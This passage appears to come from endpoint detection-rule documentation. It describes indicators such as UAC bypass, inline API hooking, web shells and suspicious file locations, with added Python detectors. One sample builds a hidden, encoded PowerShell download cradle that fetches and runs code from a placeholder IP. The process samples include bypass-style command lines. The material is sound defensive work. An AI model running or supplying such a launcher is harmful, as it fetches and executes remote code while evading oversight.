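    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze(cmdline: str) -> dict:
    opts = parse(cmdline)
    flags = []
    if "noprofile" in opts:
        flags.append("-NoProfile")
    if "noninteractive" in opts:
        flags.append("-NonInteractive")
    if (opts.get("windowstyle") or "").lower() == "hidden":
        flags.append("-WindowStyle Hidden")
    if (opts.get("executionpolicy") or "").lower() in ("bypass", "unrestricted"):
        flags.append("-ExecutionPolicy " + opts["executionpolicy"])
    script, decoded = opts.get("command"), None
    if opts.get("encodedcommand"):
        flags.append("-EncodedCommand")
        try:
            decoded = base64.b64decode(opts["encodedcommand"], validate=True).decode("utf-16-le")
            script = decoded
        except (ValueError, UnicodeDecodeError):
            flags.append("undecodable -EncodedCommand payload")
    indicators = [p for p in CRADLE_PATTERNS if re.search(p, script or "", re.IGNORECASE)]
    return {"options": opts, "decoded": decoded, "evasive_flags": flags,
            "cradle_indicators": indicators,
            # Trigger: two or more evasive switches, or any download cradle.
            "evasive": len(flags) >= 2 or bool(indicators)}


# Constructed samples: an Empire-style launcher and an ordinary scheduled script.
LAUNCHER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"
SAMPLE_EVASIVE = "powershell.exe -NoP -sta -NonI -W Hidden -Enc " + encode_command(LAUNCHER_SCRIPT)
SAMPLE_BENIGN = r"powershell.exe -NoLogo -File C:\Scripts\Inventory.ps1"

if __name__ == "__main__":
    for cmd in (SAMPLE_EVASIVE, SAMPLE_BENIGN):
        r = analyze(cmd)
        print(r["evasive"], r["evasive_flags"], r["cradle_indicators"], r["decoded"])
```

Decoding the payload is what lets the rule see the cradle; an undecodable `-EncodedCommand` value is itself reported, since a launcher that mangles its own payload is still a launcher.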
Event Viewer Executes Uncommon Binary (event_viewer_executes_uncommon_binary)
Event Viewer launching an uncommon binary can be an indication of a possible Windows User Account Control (UAC) bypass, since eventvwr.exe auto-elevates and is normally expected to start only mmc.exe. Attackers can use these techniques to elevate privileges to administrator if the target process is unprotected. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = event viewer executes uncommon binary
Executable In ADS (executable_in_ads)
Leveraging NTFS Alternate Data Streams can be a way to mask a malicious file inside a data stream of another file, which can then be executed by launching the stream it is forked into.
Explorer Public Folder DLL Load (explorer_public_folder_dll_load)
This rule returns hits from explorer.exe launching the Windows OS process rundll32.exe with a command line that references the Public\Libraries folder or ClassWindow.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = explorer public folder dll load
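The Event Viewer and Explorer rules above, like Creates Suspicious Service Running Command Prompt earlier, are not matches on a single process but on a parent/child pair: the child is suspicious only because of who started it. The following Python example is added here and is not RSA's implementation; it joins each process-creation event to its parent by pid and applies three lineage rules whose conditions are assumptions about what the rule names imply. The process list is constructed. The one check worth carrying into any real implementation is the start-time comparison: pids are reused, so a ppid that points at a process which started later than its supposed child is a stale reference, not a parent.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    start: int        # seconds since boot (constructed values)
    image: str        # executable base name, lower-case
    cmdline: str


# Constructed process-creation events (not real telemetry).
SAMPLE_PROCS = [
    Proc(600, 4, 5, "services.exe", r"C:\Windows\system32\services.exe"),
    Proc(3120, 1500, 40, "explorer.exe", "explorer.exe"),
    Proc(4400, 3120, 80, "eventvwr.exe", "eventvwr.exe"),
    Proc(4410, 4400, 81, "mmc.exe", "mmc.exe eventvwr.msc"),                # the expected child
    Proc(4520, 3120, 100, "eventvwr.exe", "eventvwr.exe"),
    Proc(4530, 4520, 90, "notepad.exe", "notepad.exe"),                     # ppid 4520 was reused: it "started" before its parent
    Proc(4531, 4520, 101, "cmd.exe", r"cmd.exe /c whoami > C:\Users\Public\w.txt"),  # bypass-style child
    Proc(4600, 3120, 120, "rundll32.exe", r"rundll32.exe C:\Users\Public\Libraries\upd.dll,Start"),
    Proc(4610, 3120, 121, "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),  # ordinary
    Proc(4700, 600, 130, "cmd.exe", r"cmd.exe /c C:\Windows\Temp\u.bat"),   # service whose binary is cmd.exe
    Proc(4710, 600, 131, "svchost.exe", "svchost.exe -k netsvcs"),
]


def _public_libraries_dll(child: Proc) -> bool:
    c = child.cmdline.lower()
    return child.image == "rundll32.exe" and ("\\public\\libraries\\" in c or "classwindow" in c)


# (meta value, required parent image, predicate on the child). These conditions
# are assumptions about what the rule names imply, not RSA's definitions.
LINEAGE_RULES = [
    ("event viewer executes uncommon binary", "eventvwr.exe", lambda c: c.image != "mmc.exe"),
    ("explorer public folder dll load", "explorer.exe", _public_libraries_dll),
    ("creates suspicious service running command prompt", "services.exe", lambda c: c.image == "cmd.exe"),
]


def evaluate(procs) -> list:
    """Join each process to its parent by pid and apply the lineage rules.
    Returns [(rule name, parent pid, child pid)]."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for child in procs:
        parent = by_pid.get(child.ppid)
        # A ppid alone is not a parent: pids are reused, so the recorded parent
        # must also have started no later than the child.
        if parent is None or parent.start > child.start:
            continue
        for name, parent_image, cond in LINEAGE_RULES:
            if parent.image == parent_image and cond(child):
                hits.append((name, parent.pid, child.pid))
    return hits


if __name__ == "__main__":
    for name, ppid, pid in evaluate(SAMPLE_PROCS):
        print(f"{name}: parent pid {ppid} -> child pid {pid}")
```

With only the pid join, notepad.exe (pid 4530) would be reported as an uncommon child of Event Viewer; the start-time check drops it, and only the cmd.exe spawned by the second eventvwr.exe, the rundll32.exe loading from Public\Libraries, and the cmd.exe started by services.exe remain.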
Exports Sensitive Registry Hive (exports_sensitive_registry_hive)
Exporting a sensitive registry hive (such as SAM, SECURITY or SYSTEM) can be an indication of someone trying to extract the credentials and secrets stored in it in order to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = exports sensitive registry hive
Extracts Password-Protected Archive (extracts_password-protected_archive)
Password-protected archives can be used to protect sensitive data, since their contents cannot be examined without the password. Extracting one can be an indication that tooling or a payload was delivered in a form that content inspection could not open.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = extracts password-protected archive
File Encrypted (file_encrypted)
A file is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection, or to make the exfiltration less conspicuous upon inspection by a defender.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = file encrypted
File Hidden (file_hidden)
To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a hidden file. Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence, evading a typical user or system analysis that does not include hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = file hidden
File Path Not Part Of RPM (file_path_not_part_of_rpm)
On RPM-based Linux systems, software is normally installed and updated through RPM packages. An executable that does not belong to any installed package could be considered suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = file path not part of rpm
File Path Not Part Of RPM In Important System Directory (file_path_not_part_of_rpm_in_important_system_directory)
On RPM-based Linux systems, software is normally installed and updated through RPM packages. An executable in an important system directory that does not belong to any installed package could be considered suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = file path not part of rpm in important system directory
File Vault Disabled (file_vault_disabled)
FileVault full-disk encryption (FileVault 2) uses XTS-AES-128 encryption with a 256-bit key to help prevent unauthorized access to the information on the startup disk. Disabling this feature decrypts the information on the startup disk.
Floating Module (floating_module)
Detects a floating code module, that is, executable code in process memory that is not backed by a file on disk, as a result of DLL injection. This may result in an attacker gaining access to internal resources, escalating privileges or disguising malicious behavior under a legitimate process.
Floating Module And Hooking (floating_module_and_hooking)
Detects floating code that is also hooking functions. The attacker masks malicious behavior under the process.
Floating Module In Browser Process (floating_module_in_browser_process)
Detects a floating code module as a result of DLL injection into a browser. The attacker masks malicious behavior under the legitimate browser process.
Floating Module In OS Process (floating_module_in_os_process)
Detects a floating code module as a result of DLL injection into an operating system process. The attacker masks malicious behavior under the legitimate OS process.
Gatekeeper Disabled (gatekeeper_disabled)
Gatekeeper is a security feature of macOS. It enforces code signing and verifies downloaded applications before allowing them to run, thereby reducing the likelihood of inadvertently executing malware.
Gets Current User As SYSTEM (gets_current_user_as_system)
Querying the current user while running as SYSTEM can be an indication of someone checking the privileges of a freshly obtained foothold in order to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = gets current user as system
Gets Current Username (gets_current_username)
Querying the current username can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gets current username
Gets Current Username And Group Information (gets_current_username_and_group_information)
Querying the current username and group membership can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gets current username and group information
Gets Hostname (gets_hostname)
Enumeration of hostnames can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gets hostname
Gets Remote Time (gets_remote_time)
Getting the time of a remote system can be an indication of someone gathering information that is useful for other techniques, such as executing a file with a scheduled task, or of discovering locality information from the time zone to assist in victim targeting.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gets remote time
GINA Replacement (gina_replacement)
GINA (Graphical Identification and Authentication) is the Windows component that handled the logon screen on Windows XP, Windows Server 2003 and earlier. The GINA DLL can be replaced with another DLL to intercept credentials. Windows Vista and later replaced GINA with the Credential Provider model, so a GINA replacement on a current system is unexpected and worth investigating.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gina replacement
Graylisted File (graylisted_file)
An analyst may mark files as graylisted within NetWitness Endpoint. This rule triggers when an action on an endpoint has one of those graylisted files as its source.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = graylisted file
Hidden And Hooking (hidden_and_hooking)
Hooking may be used to intercept and execute code in response to events. If the hooking file is also hidden, this could indicate an attacker attempting to evade detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = hidden and hooking
Hidden In AppData (hidden_in_appdata)
A hidden file under a user's AppData directory can be an indication of someone trying to store malware where a typical user or system analysis that does not include hidden files will not find it. AppData is writable without administrative privileges and is a common location for dropped malware and its persistence artifacts.
Hidden Plist And Autorun (hidden_plist_and_autorun)
A plist (property list) is a flexible and convenient format for storing application data. Adversaries can modify plist files to point to their own code, use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. A hidden plist that is also an autorun entry combines that persistence with an attempt to evade inspection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hidden plist and autorun
Hidden Running As Root (hidden_running_as_root)
Files are typically hidden to prevent users from accidentally changing them. A hidden file running with root privileges may indicate an attacker trying to evade detection while installing malware to maintain persistence.
Hooks Audio Output Function (hooks_audio_output_function)
A hook intercepts calls that an application makes, such as keystrokes, network activity and file operations, and diverts them to a hook procedure that can observe, change or reject the event. Hooking audio output functions is a way to capture audio from the host.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks audio output function
Hooks Authentication Function (hooks_authentication_function)
A hook intercepts calls that an application makes, such as keystrokes, network activity and file operations, and diverts them to a hook procedure that can observe, change or reject the event. Hooking authentication functions lets an attacker capture credentials as they are supplied.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks authentication function
Hooks Crypto Function (hooks_crypto_function)
A hook intercepts calls that an application makes, such as keystrokes, network activity and file operations, and diverts them to a hook procedure that can observe, change or reject the event. Hooking cryptographic functions lets an attacker read data before it is encrypted or after it is decrypted, or steal keys.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks crypto function
Hooks DnsQuery Function (hooks_dnsquery_function): A hook intercepts the calls an application makes, such as keystrokes, network and file operations, and diverts them to a hook procedure that can alter or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks dnsquery function
Hooks GUI Function (hooks_gui_function): A hook intercepts the calls an application makes, such as keystrokes, network and file operations, and diverts them to a hook procedure that can alter or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks gui function
Hooks Network HTTP Function (hooks_network_http_function): A hook intercepts the calls an application makes, such as keystrokes, network and file operations, and diverts them to a hook procedure that can alter or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks network http function
Hooks Network IO Function (hooks_network_io_function): A hook intercepts the calls an application makes, such as keystrokes, network and file operations, and diverts them to a hook procedure that can alter or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks network io function
Hooks NtLdr Function (hooks_ntldr_function): A hook intercepts the calls an application makes, such as keystrokes, network and file operations, and diverts them to a hook procedure that can alter or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks ntldr function
Hooks Registry Access Function (hooks_registry_access_function): A hook intercepts the calls an application makes, such as keystrokes, network and file operations, and diverts them to a hook procedure that can alter or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks registry access function
Hooks Registry Enumeration Function (hooks_registry_enumeration_function): A hook intercepts the calls an application makes, such as keystrokes, network and file operations, and diverts them to a hook procedure that can alter or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks registry enumeration function
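The "Hooks ... Function" rules above all describe the same mechanism: the first bytes of an exported API are overwritten with a jump into the hooking code. The following added example (not NetWitness code) shows how such an inline hook is recognised from the prologue bytes of a function and how the hooked API name maps onto the rule families in this table. The module layout, the constructed prologues and the name-to-category mapping are assumptions; a real run would read the bytes from a live process or a memory dump.

```python
"""Inline (prologue) hook detection over constructed export prologues.
Added example; the module layout, the hook target and the API-to-rule
mapping are assumptions, not NetWitness internals."""
import struct

MASK64 = (1 << 64) - 1


def hook_target(func_addr: int, code: bytes):
    """Classify the first instruction of a function prologue.

    Returns (kind, target) for the trampoline shapes user-mode hooking engines
    commonly write, or (None, None) when the prologue does not start with a jump.
    For 'jmp [rip+disp32]' the target is the pointer slot, not the final address.
    """
    if len(code) >= 5 and code[0] == 0xE9:                          # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (func_addr + 5 + rel) & MASK64
    if len(code) >= 6 and code[:2] == b"\xff\x25":                  # jmp [rip+disp32] (x64)
        disp = struct.unpack_from("<i", code, 2)[0]
        return "jmp [rip+disp32]", (func_addr + 6 + disp) & MASK64
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:      # push imm32 ; ret
        return "push/ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 12 and code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":
        return "mov rax,imm64 ; jmp rax", struct.unpack_from("<Q", code, 2)[0]
    return None, None


# Assumed mapping from API name prefix to the rule family in the table above.
CATEGORY_PREFIXES = [
    (("Nt", "Zw", "Ldr"),                                 "hooks ntldr function"),
    (("Crypt", "BCrypt", "NCrypt"),                       "hooks crypto function"),
    (("DnsQuery",),                                       "hooks dnsquery function"),
    (("HttpSendRequest", "HttpOpenRequest", "WinHttp"),   "hooks network http function"),
    (("send", "recv", "WSASend", "WSARecv", "connect"),   "hooks network io function"),
    (("RegEnum",),                                        "hooks registry enumeration function"),
    (("RegOpenKey", "RegQueryValue", "RegSetValue"),      "hooks registry access function"),
    (("LogonUser", "LsaLogonUser", "CredRead"),           "hooks authentication function"),
    (("waveOut",),                                        "hooks audio output function"),
    (("GetMessage", "PeekMessage", "SetWindowsHookEx"),   "hooks gui function"),
]


def category(api_name: str) -> str:
    for prefixes, rule in CATEGORY_PREFIXES:
        if api_name.startswith(prefixes):
            return rule
    return "hooks function"


def audit(module_base: int, module_size: int, exports: dict):
    """exports: {api_name: (address, prologue bytes)}.

    Flags prologues that jump outside the owning module, which is what a hook
    planted by an injected DLL looks like. Jumps that stay inside the module are
    ignored because compilers and OS hot-patching emit those legitimately.
    """
    findings = []
    for name, (addr, code) in exports.items():
        kind, target = hook_target(addr, code)
        if kind is None or module_base <= target < module_base + module_size:
            continue
        findings.append((name, category(name), kind, target))
    return findings


# ---- constructed sample: an ntdll-like module with one export hooked ----
NTDLL_BASE, NTDLL_SIZE = 0x7FF800000000, 0x1F0000
HOOK_DLL_TARGET = 0x7FF7A0001000            # inside some other (injected) module
NT_CREATE_FILE = NTDLL_BASE + 0x9D000
CLEAN_STUB = bytes.fromhex("4c8bd1b855000000")   # mov r10,rcx ; mov eax,0x55 (syscall stub shape)


def trampoline(func_addr: int, target: int) -> bytes:
    """The 5-byte 'jmp rel32' a hooking engine writes over a prologue."""
    return b"\xe9" + struct.pack("<i", target - (func_addr + 5))


SAMPLE_EXPORTS = {
    "NtCreateFile": (NT_CREATE_FILE, trampoline(NT_CREATE_FILE, HOOK_DLL_TARGET) + CLEAN_STUB[5:]),
    "NtWriteFile":  (NTDLL_BASE + 0x9D1A0, CLEAN_STUB),
    # intra-module jump: left alone by audit()
    "LdrLoadDll":   (NTDLL_BASE + 0x21000, trampoline(NTDLL_BASE + 0x21000, NTDLL_BASE + 0x21010)),
}

if __name__ == "__main__":
    for name, rule, kind, target in audit(NTDLL_BASE, NTDLL_SIZE, SAMPLE_EXPORTS):
        print(f"{name}: {kind} -> {target:#x} ({rule})")
```

Security products, including EDR agents, hook the same functions, so a finding from this check identifies the module that owns the jump target before it is treated as malicious.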
HTTP Daemon Runs Command Prompt (http_daemon_runs_command_prompt): An HTTP daemon running a command prompt can be an indication of a web shell executing commands. A web shell may serve as redundant access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = http daemon runs command prompt
HTTP Daemon Runs Powershell (http_daemon_runs_powershell): An HTTP daemon running PowerShell can be an indication of a web shell executing commands. A web shell may serve as redundant access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = http daemon runs powershell
HTTP Daemon Runs Reconnaissance Tool (http_daemon_runs_reconnaissance_tool): An HTTP daemon running a reconnaissance tool can be an indication of a web shell executing commands. A web shell may serve as redundant access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = http daemon runs reconnaissance tool
HTTP Daemon Writes Executable (http_daemon_writes_executable): An HTTP daemon writing an executable can be an indication of a web shell dropping tooling. A web shell may serve as redundant access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = http daemon writes executable
IE DEP Disabled (ie_dep_disabled): Disabling Data Execution Prevention (DEP) for Internet Explorer removes an exploit mitigation. This can be an indication of someone weakening the system's defences ahead of exploitation, or trying to compromise the integrity of the security solution so that activity goes unreported and forensic analysis becomes harder.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = ie dep disabled
IE Enhanced Security Disabled (ie_enhanced_security_disabled): Disabling Internet Explorer Enhanced Security Configuration can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = ie enhanced security disabled
In AppData Directory (in_appdata_directory): These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in appdata directory
In Hidden Directory (in_hidden_directory): To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a hidden file. Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence, evading a typical user or system analysis that does not incorporate investigation of hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in hidden directory
In Recycle Bin Directory (in_recycle_bin_directory): A file found in the recycle bin directory may be suspicious.
In Root Of AppDataLocal Directory (in_root_of_appdatalocal_directory): These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in root of appdatalocal directory
In Root Of AppDataRoaming Directory (in_root_of_appdataroaming_directory): These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in root of appdataroaming directory
In Root Of Logical Drive (in_root_of_logical_drive): While the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of a logical drive (for example, directly under C:\).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = in root of logical drive
In Root Of Program Directory (in_root_of_program_directory): These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in root of program directory
In Root Of Users Directory (in_root_of_users_directory): These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = in root of users directory
In System Volume Information Directory (in_system_volume_information_directory)

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in system volume information directory
In Temporary Directory (in_temporary_directory): These locations are often used by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in temporary directory
In Uncommon Directory (in_uncommon_directory): A file found in an uncommon directory may be suspicious.
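The file-location rules above (In AppData Directory through In Uncommon Directory, together with Misleading File Extension further down) are all questions about where a file sits and what its name claims. The following added example, which is not NetWitness code, shows one way to evaluate those questions over a file path; the regular expressions are my reading of each rule name, and the sample paths are constructed. It also demonstrates the space-padded double extension (a document extension followed by an executable one) that the misleading-extension rule targets.

```python
"""File-location and file-name indicators over constructed Windows paths.
Added example; the patterns are assumptions about what each rule name means,
not the product's own matching logic."""
import ntpath
import re
from typing import Dict, List

DOC_EXT = r"(?:pdf|docx?|xlsx?|pptx?|jpe?g|png|txt|zip|rtf)"
EXEC_EXT = r"(?:exe|scr|com|pif|bat|cmd|js|jse|vbs|vbe|wsf|hta|ps1)"

LOCATION_RULES = [
    # (rule name, regex applied to the lower-cased directory part of the path)
    ("in root of logical drive",               r"^[a-z]:\\$"),
    ("in root of users directory",             r"^[a-z]:\\users$"),
    ("in root of program directory",           r"^[a-z]:\\program files(?: \(x86\))?$"),
    ("in appdata directory",                   r"\\appdata(?:\\|$)"),
    ("in root of appdatalocal directory",      r"^[a-z]:\\users\\[^\\]+\\appdata\\local$"),
    ("in root of appdataroaming directory",    r"^[a-z]:\\users\\[^\\]+\\appdata\\roaming$"),
    ("in temporary directory",                 r"\\(?:temp|tmp)(?:\\|$)"),
    ("in recycle bin directory",               r"\\\$recycle\.bin(?:\\|$)"),
    ("in system volume information directory", r"\\system volume information(?:\\|$)"),
]


def classify_path(path: str) -> List[str]:
    """Return every location/name rule that the given path satisfies."""
    norm = path.replace("/", "\\").lower()
    directory, name = ntpath.split(norm)          # ntpath works on any OS
    tags = [rule for rule, rx in LOCATION_RULES if re.search(rx, directory)]
    # Misleading extension: a document extension followed by an executable one,
    # optionally padded with spaces so the real extension scrolls out of view.
    if re.search(rf"\.{DOC_EXT}\s*\.{EXEC_EXT}$", name):
        tags.append("misleading file extension")
    return tags


# Constructed sample paths with the tags they should produce.
EXPECTED: Dict[str, List[str]] = {
    r"C:\svchost.exe": ["in root of logical drive"],
    r"C:\Users\alice\AppData\Roaming\update.exe":
        ["in appdata directory", "in root of appdataroaming directory"],
    r"C:\Users\alice\AppData\Local\Temp\invoice.pdf        .exe":
        ["in appdata directory", "in temporary directory", "misleading file extension"],
    r"C:\$Recycle.Bin\S-1-5-21-1-2-3-1001\loader.exe": ["in recycle bin directory"],
    r"C:\Program Files\Vendor\app.exe": [],
}

if __name__ == "__main__":
    for p in EXPECTED:
        print(f"{p!r}: {classify_path(p)}")
```

Location alone is a weak signal (installers such as OneDrive legitimately run from AppData), which is why the table pairs these tags with signing state and behaviour, for example in Outbound from Unsigned AppData Directory.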
Installs Root Certificate (installs_root_certificate): Installing a root certificate on a compromised system lets certificates issued by the adversary chain to a trusted root, so signed malware or intercepted TLS traffic appears legitimate. It can be an indication of an adversary trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = installs root certificate
Invalid Signature (invalid_signature): The file's digital signature does not verify, which indicates that the code may have been altered or corrupted since it was signed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = invalid signature
Kext Signature Validation Disabled (kext_signature_validation_disabled): Kernel extension (kext) signature validation is a code signing requirement for all extensions and drivers located in the extensions folder. Disabling it may expose the system to unsigned rootkits or other malware.
Lateral Movement With Credentials Using Net Utility (lateral_movement_with_credentials_using_net_utility): This rule looks for instances of 'net use' being run with a username and/or password passed on the command line. The technique is used once attackers have gained access to a network and obtained credentials, to move laterally from system to system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc =lateral movement with credentials using net utility
LD Preload (ld_preload): The LD_PRELOAD environment variable makes the dynamic loader load a library into a process ahead of its other dependencies, which can be used to intercept API calls made by the running process.
Library Preferences Directory (library_preferences_directory): Adversaries can use the list of specific applications to run when a user logs in. These login items are stored in the user's ~/Library/Preferences/ directory in a plist file called com.apple.loginitems.plist.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = library preferences directory
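The Hidden Plist And Autorun and Library Preferences Directory rules both come down to reading a plist and asking what it launches, from where, and whether it is hidden. The following added example (not NetWitness or Apple code) inspects a launchd-style job plist with Python's standard plistlib. It assumes the launchd keys Program, ProgramArguments, RunAtLoad and KeepAlive; the sample plists and the scratch-directory list are constructed.

```python
"""Launch-item plist inspection for the macOS rules above. Added example;
the sample plists, the path heuristics and the tag names are constructed
assumptions, not the product's rule logic."""
import plistlib
from typing import List

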